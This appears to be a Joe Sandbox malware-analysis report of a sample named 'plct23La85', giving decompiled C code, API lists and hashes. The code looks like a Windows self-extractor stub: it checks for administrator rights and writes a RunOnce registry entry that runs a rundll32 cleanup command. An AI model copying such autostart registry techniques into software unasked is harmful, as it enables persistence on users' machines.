                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                    • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                    • API String ID: 1865808269-1731843650
                                                                                                                                                                                                    • Opcode ID: ac60b09ee932fbf9bf62e48976308c813110e1bf2bb6d04ce7bda3c2f1b2d2ac
                                                                                                                                                                                                    • Instruction ID: 0b26f429a41f388bcae02689ef8b44613f781f5149c8608cd85be9f367ad7f03
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac60b09ee932fbf9bf62e48976308c813110e1bf2bb6d04ce7bda3c2f1b2d2ac
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7541E274A00314AFEB11AFA4EC98AAEBFB4FF49344F5401A9F981A3251CB749C81C761
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                    			E00132773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				char _v269;
                                                                                                                                                                                                    				CHAR* _v276;
                                                                                                                                                                                                    				int _v280;
                                                                                                                                                                                                    				void* _v284;
                                                                                                                                                                                                    				int _v288;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t23;
                                                                                                                                                                                                    				intOrPtr _t34;
                                                                                                                                                                                                    				int _t45;
                                                                                                                                                                                                    				int* _t50;
                                                                                                                                                                                                    				CHAR* _t52;
                                                                                                                                                                                                    				CHAR* _t61;
                                                                                                                                                                                                    				char* _t62;
                                                                                                                                                                                                    				int _t63;
                                                                                                                                                                                                    				CHAR* _t64;
                                                                                                                                                                                                    				signed int _t65;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t52 = __ecx;
                                                                                                                                                                                                    				_t23 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                    				_t62 = _a4;
                                                                                                                                                                                                    				_t50 = 0;
                                                                                                                                                                                                    				_t61 = __ecx;
                                                                                                                                                                                                    				_v276 = _t62;
                                                                                                                                                                                                    				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                    				if( *_t62 != 0x23) {
                                                                                                                                                                                                    					_t63 = 0x104;
                                                                                                                                                                                                    					goto L14;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t64 = _t62 + 1;
                                                                                                                                                                                                    					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                    					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                    					_t63 = 0x104;
                                                                                                                                                                                                    					_t34 = _v269;
                                                                                                                                                                                                    					if(_t34 == 0x53) {
                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                    						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                    						goto L15;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						if(_t34 == 0x57) {
                                                                                                                                                                                                    							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_push(_t52);
                                                                                                                                                                                                    							_v288 = 0x104;
                                                                                                                                                                                                    							E00131781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                    							_t59 = 0x104;
                                                                                                                                                                                                    							E0013658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                    							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                    								L16:
                                                                                                                                                                                                    								_t59 = _t63;
                                                                                                                                                                                                    								E0013658A(_t61, _t63, _v276);
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								if(RegQueryValueExA(_v284, 0x131140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                    									_t45 = _v280;
                                                                                                                                                                                                    									if(_t45 != 2) {
                                                                                                                                                                                                    										L9:
                                                                                                                                                                                                    										if(_t45 == 1) {
                                                                                                                                                                                                    											goto L10;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                    											_t45 = _v280;
                                                                                                                                                                                                    											goto L9;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											_t59 = 0x104;
                                                                                                                                                                                                    											E00131680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                    											L10:
                                                                                                                                                                                                    											_t50 = 1;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								RegCloseKey(_v284);
                                                                                                                                                                                                    								L15:
                                                                                                                                                                                                    								if(_t50 == 0) {
                                                                                                                                                                                                    									goto L16;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00136CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                    			}























                                                                                                                                                                                                    0x00132773
                                                                                                                                                                                                    0x0013277e
                                                                                                                                                                                                    0x00132785
                                                                                                                                                                                                    0x0013278a
                                                                                                                                                                                                    0x0013278d
                                                                                                                                                                                                    0x00132790
                                                                                                                                                                                                    0x00132792
                                                                                                                                                                                                    0x00132798
                                                                                                                                                                                                    0x0013279d
                                                                                                                                                                                                    0x001328b2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001327a3
                                                                                                                                                                                                    0x001327a3
                                                                                                                                                                                                    0x001327af
                                                                                                                                                                                                    0x001327c2
                                                                                                                                                                                                    0x001327c8
                                                                                                                                                                                                    0x001327cd
                                                                                                                                                                                                    0x001327d5
                                                                                                                                                                                                    0x001328b7
                                                                                                                                                                                                    0x001328b9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001327db
                                                                                                                                                                                                    0x001327dd
                                                                                                                                                                                                    0x001328aa
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001327e3
                                                                                                                                                                                                    0x001327e3
                                                                                                                                                                                                    0x001327ec
                                                                                                                                                                                                    0x001327f8
                                                                                                                                                                                                    0x00132803
                                                                                                                                                                                                    0x0013280b
                                                                                                                                                                                                    0x00132831
                                                                                                                                                                                                    0x001328c3
                                                                                                                                                                                                    0x001328c9
                                                                                                                                                                                                    0x001328cd
                                                                                                                                                                                                    0x00132837
                                                                                                                                                                                                    0x0013285a
                                                                                                                                                                                                    0x0013285c
                                                                                                                                                                                                    0x00132865
                                                                                                                                                                                                    0x00132892
                                                                                                                                                                                                    0x00132895
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00132867
                                                                                                                                                                                                    0x00132878
                                                                                                                                                                                                    0x0013288c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013287a
                                                                                                                                                                                                    0x00132880
                                                                                                                                                                                                    0x00132885
                                                                                                                                                                                                    0x00132897
                                                                                                                                                                                                    0x00132899
                                                                                                                                                                                                    0x00132899
                                                                                                                                                                                                    0x00132878
                                                                                                                                                                                                    0x00132865
                                                                                                                                                                                                    0x001328a0
                                                                                                                                                                                                    0x001328bf
                                                                                                                                                                                                    0x001328c1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001328c1
                                                                                                                                                                                                    0x00132831
                                                                                                                                                                                                    0x001327dd
                                                                                                                                                                                                    0x001327d5
                                                                                                                                                                                                    0x001328e5

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CharUpperA.USER32(E764604F,00000000,00000000,00000000), ref: 001327A8
                                                                                                                                                                                                    • CharNextA.USER32(0000054D), ref: 001327B5
                                                                                                                                                                                                    • CharNextA.USER32(00000000), ref: 001327BC
                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00132829
                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00131140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00132852
                                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00132870
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001328A0
                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 001328AA
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 001328B9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 001327E4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                    • API String ID: 2659952014-2428544900
                                                                                                                                                                                                    • Opcode ID: ce320c30489c9b6f91fbc59e7836603637f621d981d36d66c7455a88c4ce805e
                                                                                                                                                                                                    • Instruction ID: a4d7256dc3e9ccbb6cbf51407fb72e9b0b2c79055d1f2d16991202e7c5061727
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce320c30489c9b6f91fbc59e7836603637f621d981d36d66c7455a88c4ce805e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10418571A0012CAFDB24AB649C85AFA7BBDEF55700F4440E9F589D2110DB708EC58FA1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                                                                                    			E00132267() {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				char _v836;
                                                                                                                                                                                                    				void* _v840;
                                                                                                                                                                                                    				int _v844;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t19;
                                                                                                                                                                                                    				intOrPtr _t33;
                                                                                                                                                                                                    				void* _t38;
                                                                                                                                                                                                    				intOrPtr* _t42;
                                                                                                                                                                                                    				void* _t45;
                                                                                                                                                                                                    				void* _t47;
                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                    				signed int _t51;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t19 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                    				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                    				if( *0x138530 != 0) {
                                                                                                                                                                                                    					_push(_t49);
                                                                                                                                                                                                    					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                    						_push(_t38);
                                                                                                                                                                                                    						_v844 = 0x238;
                                                                                                                                                                                                    						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                    							_push(_t47);
                                                                                                                                                                                                    							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                    							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                    								E0013658A( &_v268, 0x104, 0x131140);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_push("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                    							E0013171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                    							_t42 =  &_v836;
                                                                                                                                                                                                    							_t45 = _t42 + 1;
                                                                                                                                                                                                    							_pop(_t47);
                                                                                                                                                                                                    							do {
                                                                                                                                                                                                    								_t33 =  *_t42;
                                                                                                                                                                                                    								_t42 = _t42 + 1;
                                                                                                                                                                                                    							} while (_t33 != 0);
                                                                                                                                                                                                    							RegSetValueExA(_v840, "wextract_cleanup2", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                    						_pop(_t38);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_pop(_t49);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00136CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                    			}



















                                                                                                                                                                                                    0x00132272
                                                                                                                                                                                                    0x00132277
                                                                                                                                                                                                    0x00132279
                                                                                                                                                                                                    0x00132283
                                                                                                                                                                                                    0x00132289
                                                                                                                                                                                                    0x001322ab
                                                                                                                                                                                                    0x001322b1
                                                                                                                                                                                                    0x001322c4
                                                                                                                                                                                                    0x001322e0
                                                                                                                                                                                                    0x001322e6
                                                                                                                                                                                                    0x001322f5
                                                                                                                                                                                                    0x0013230d
                                                                                                                                                                                                    0x0013231c
                                                                                                                                                                                                    0x0013231c
                                                                                                                                                                                                    0x00132321
                                                                                                                                                                                                    0x0013233a
                                                                                                                                                                                                    0x00132342
                                                                                                                                                                                                    0x00132348
                                                                                                                                                                                                    0x0013234b
                                                                                                                                                                                                    0x0013234c
                                                                                                                                                                                                    0x0013234c
                                                                                                                                                                                                    0x0013234e
                                                                                                                                                                                                    0x0013234f
                                                                                                                                                                                                    0x0013236e
                                                                                                                                                                                                    0x0013236e
                                                                                                                                                                                                    0x0013237a
                                                                                                                                                                                                    0x00132380
                                                                                                                                                                                                    0x00132380
                                                                                                                                                                                                    0x00132381
                                                                                                                                                                                                    0x00132381
                                                                                                                                                                                                    0x0013238f

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 001322A3
                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000000,?,?,00000001), ref: 001322D8
                                                                                                                                                                                                    • memset.MSVCRT ref: 001322F5
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00132305
                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0013236E
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0013237A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00132299
                                                                                                                                                                                                    • wextract_cleanup2, xrefs: 0013227C, 001322CD, 00132363
                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00132321
                                                                                                                                                                                                    • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0013232D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup2
                                                                                                                                                                                                    • API String ID: 3027380567-2274915764
                                                                                                                                                                                                    • Opcode ID: d40d8f24653d46d558bf4801d9bf27267a6e1c2aeb0b5ba34a4bb9696fde9ce0
                                                                                                                                                                                                    • Instruction ID: e661c8683f63d27f3241a8c2e4969c873152f721e227442dbdf6128115d39fad
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d40d8f24653d46d558bf4801d9bf27267a6e1c2aeb0b5ba34a4bb9696fde9ce0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F731E671A00218BBDB25AB60DC89FEB7B7CEF18700F0001E9F54DA6050EB71AF88CA50
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                    			E00133100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                    				void* _t15;
                                                                                                                                                                                                    				struct HWND__* _t16;
                                                                                                                                                                                                    				struct HWND__* _t33;
                                                                                                                                                                                                    				struct HWND__* _t34;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t8 = _a8 - 0xf;
                                                                                                                                                                                                    				if(_t8 == 0) {
                                                                                                                                                                                                    					if( *0x138590 == 0) {
                                                                                                                                                                                                    						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                    						 *0x138590 = 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L13:
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t11 = _t8 - 1;
                                                                                                                                                                                                    				if(_t11 == 0) {
                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                    					EndDialog(_a4, ??);
                                                                                                                                                                                                    					L9:
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t15 = _t11 - 0x100;
                                                                                                                                                                                                    				if(_t15 == 0) {
                                                                                                                                                                                                    					_t16 = GetDesktopWindow();
                                                                                                                                                                                                    					_t33 = _a4;
                                                                                                                                                                                                    					E001343D0(_t33, _t16);
                                                                                                                                                                                                    					SetDlgItemTextA(_t33, 0x834,  *0x138d4c);
                                                                                                                                                                                                    					SetWindowTextA(_t33, "nst0dum");
                                                                                                                                                                                                    					SetForegroundWindow(_t33);
                                                                                                                                                                                                    					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                    					 *0x1388b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                    					SetWindowLongA(_t34, 0xfffffffc, E001330C0);
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t15 != 1) {
                                                                                                                                                                                                    					goto L13;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_a12 != 6) {
                                                                                                                                                                                                    					if(_a12 != 7) {
                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L7;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_push(1);
                                                                                                                                                                                                    				goto L8;
                                                                                                                                                                                                    			}









                                                                                                                                                                                                    0x00133108
                                                                                                                                                                                                    0x0013310b
                                                                                                                                                                                                    0x001331b7
                                                                                                                                                                                                    0x001331ca
                                                                                                                                                                                                    0x001331d0
                                                                                                                                                                                                    0x001331d0
                                                                                                                                                                                                    0x001331da
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001331da
                                                                                                                                                                                                    0x00133111
                                                                                                                                                                                                    0x00133114
                                                                                                                                                                                                    0x00133136
                                                                                                                                                                                                    0x00133136
                                                                                                                                                                                                    0x00133138
                                                                                                                                                                                                    0x0013313b
                                                                                                                                                                                                    0x00133141
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133143
                                                                                                                                                                                                    0x00133116
                                                                                                                                                                                                    0x0013311b
                                                                                                                                                                                                    0x0013314b
                                                                                                                                                                                                    0x00133151
                                                                                                                                                                                                    0x00133158
                                                                                                                                                                                                    0x0013316a
                                                                                                                                                                                                    0x00133176
                                                                                                                                                                                                    0x0013317d
                                                                                                                                                                                                    0x0013318b
                                                                                                                                                                                                    0x0013319e
                                                                                                                                                                                                    0x001331a3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001331ad
                                                                                                                                                                                                    0x00133120
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013312a
                                                                                                                                                                                                    0x00133134
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133134
                                                                                                                                                                                                    0x0013312c
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 0013313B
                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0013314B
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000834), ref: 0013316A
                                                                                                                                                                                                    • SetWindowTextA.USER32(?,nst0dum), ref: 00133176
                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0013317D
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000834), ref: 00133185
                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000FC), ref: 00133190
                                                                                                                                                                                                    • SetWindowLongA.USER32(00000000,000000FC,001330C0), ref: 001331A3
                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 001331CA
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                    • String ID: nst0dum
                                                                                                                                                                                                    • API String ID: 3785188418-432003757
                                                                                                                                                                                                    • Opcode ID: 5b881f12375639d4df1826e0111696700f23c31a7a3be9e0bdbf500c35439c99
                                                                                                                                                                                                    • Instruction ID: 9126e1384488f421dc2470af5d26a171034966af69b532144778191870f11a70
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b881f12375639d4df1826e0111696700f23c31a7a3be9e0bdbf500c35439c99
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7811E631248211BBDB11AF24DC0CFAA3A64FF5A731F500610F875E19E0DBB49781D74A
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                                                    			E001318A3(void* __edx, void* __esi) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				short _v12;
                                                                                                                                                                                                    				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                    				long _v24;
                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                    				void* _v32;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				signed int _t23;
                                                                                                                                                                                                    				long _t45;
                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                    				int _t50;
                                                                                                                                                                                                    				void* _t52;
                                                                                                                                                                                                    				signed int _t53;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t51 = __esi;
                                                                                                                                                                                                    				_t49 = __edx;
                                                                                                                                                                                                    				_t23 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                    				_t25 =  *0x138128; // 0x2
                                                                                                                                                                                                    				_t45 = 0;
                                                                                                                                                                                                    				_v12 = 0x500;
                                                                                                                                                                                                    				_t50 = 2;
                                                                                                                                                                                                    				_v16.Value = 0;
                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                    				if(_t25 != _t50) {
                                                                                                                                                                                                    					L20:
                                                                                                                                                                                                    					return E00136CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(E001317EE( &_v20) != 0) {
                                                                                                                                                                                                    					_t25 = _v20;
                                                                                                                                                                                                    					if(_v20 != 0) {
                                                                                                                                                                                                    						 *0x138128 = 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                    					L17:
                                                                                                                                                                                                    					CloseHandle(_v28);
                                                                                                                                                                                                    					_t25 = _v20;
                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_push(__esi);
                                                                                                                                                                                                    					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                    					if(_t52 == 0) {
                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                    						_pop(_t51);
                                                                                                                                                                                                    						goto L17;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                    						L15:
                                                                                                                                                                                                    						LocalFree(_t52);
                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						if( *_t52 <= 0) {
                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                    							FreeSid(_v32);
                                                                                                                                                                                                    							goto L15;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                    						_t50 = _t15;
                                                                                                                                                                                                    						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                    							_t45 = _t45 + 1;
                                                                                                                                                                                                    							_t50 = _t50 + 8;
                                                                                                                                                                                                    							if(_t45 <  *_t52) {
                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *0x138128 = 1;
                                                                                                                                                                                                    						_v20 = 1;
                                                                                                                                                                                                    						goto L14;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}


















                                                                                                                                                                                                    0x001318a3
                                                                                                                                                                                                    0x001318a3
